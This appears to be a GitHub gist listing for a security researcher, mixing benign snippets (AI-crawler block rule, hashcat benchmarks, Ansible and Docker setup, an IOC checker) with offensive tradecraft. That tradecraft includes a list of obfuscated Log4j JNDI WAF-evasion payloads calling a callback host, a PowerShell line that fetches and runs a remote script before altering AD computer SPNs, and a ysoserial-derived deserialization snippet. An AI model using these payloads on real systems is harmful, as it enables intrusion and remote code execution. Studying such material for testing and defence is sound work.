Building tools and tradecraft to help red and blue

Andy | ZephrFish ZephrFish

@ZephrFish
ZephrFish / cloudflareai.expression
Created May 31, 2025 11:30
CloudFlare block AI crawlers
(http.user_agent contains "GPTBot") or (http.user_agent contains "ChatGPT-User") or (http.user_agent contains "ClaudeBot") or (http.user_agent contains "PerplexityBot") or (http.user_agent contains "cohere-ai") or (http.user_agent contains "CCBot") or (http.user_agent contains "Anthropic-AI") or (http.user_agent contains "Bytespider") or (http.user_agent contains "Applebot") or (http.user_agent contains "Diffbot") or (http.user_agent contains "YandexGPT") or (http.user_agent contains "GigaChat") or (http.user_agent contains "Manus") or (http.user_agent contains "Devin") or (starts_with(http.user_agent, "Operator")) or (starts_with(http.user_agent, "Gemini"))
Benchmark is from an AI Cloud Rig:
https://cloud.vast.ai/?ref_id=127244
hashcat (v6.2.6-851-g6716447df) starting in benchmark mode
CUDA API (CUDA 12.8)
====================
* Device #1: NVIDIA GeForce RTX 5090, 31610/32120 MB, 170MCU
* Device #2: NVIDIA GeForce RTX 5090, 31610/32120 MB, 170MCU
* Device #3: NVIDIA GeForce RTX 5090, 31610/32120 MB, 170MCU
@ZephrFish
ZephrFish / TaskbarAndSoftware.yml
Last active June 15, 2024 21:56
Ansible for configuring windows taskbar and basic setup
---
- name: Configure Windows Taskbar and Install Software
  hosts: windows
  tasks:
    - name: Hide the search box on the taskbar
      win_regedit:
        path: HKCU:\Software\Microsoft\Windows\CurrentVersion\Search
        name: SearchboxTaskbarMode
        data: 0
        type: dword
@ZephrFish
ZephrFish / DockerSetupUbunut.sh
Created June 2, 2024 11:23
DockerSetupNix.sh
for pkg in docker.io docker-doc docker-compose docker-compose-v2 podman-docker containerd runc; do sudo apt-get remove $pkg; done
# Add Docker's official GPG key:
sudo apt-get update
sudo apt-get install ca-certificates curl -y
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
# Add the repository to Apt sources:
@ZephrFish
ZephrFish / 14_RTX_4090_v6.2.6.Benchmark.txt
Last active May 20, 2025 20:18
Hashcat v6.2.6 benchmark on 14x Nvidia RTX 4090
Benchmark is from an AI Cloud Rig:
https://cloud.vast.ai/?ref_id=127244
hashcat (v6.2.6) starting in benchmark mode
Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.
//All credit goes to Ysoserial.net and the great @tiraniddo
//Snippets copied from ysoserial.net
//https://thewover.github.io/Mixed-Assemblies/ - Great read!
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read
using System;
using System.Collections.Generic;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Reflection;
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )
Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
# In my testing I had to set dnshostname to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local
@ZephrFish
ZephrFish / Log4j Payloads
Last active December 20, 2022 19:32
Collection of WAF evasion payloads
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
@ZephrFish
ZephrFish / IOC-Checker.ps1
Last active February 3, 2021 10:10
Threat Analysis Group IOC Scanner
# Checks the registry for IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# If not vulnerable should return "ERROR: The system was unable to find the specified registry key or value."
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig"
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update"
# Checks the paths of IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# If not vulnerable each will return false
Test-Path C:\Windows\System32\Nwsapagent.sys
Test-Path C:\Windows\System32\helpsvc.sys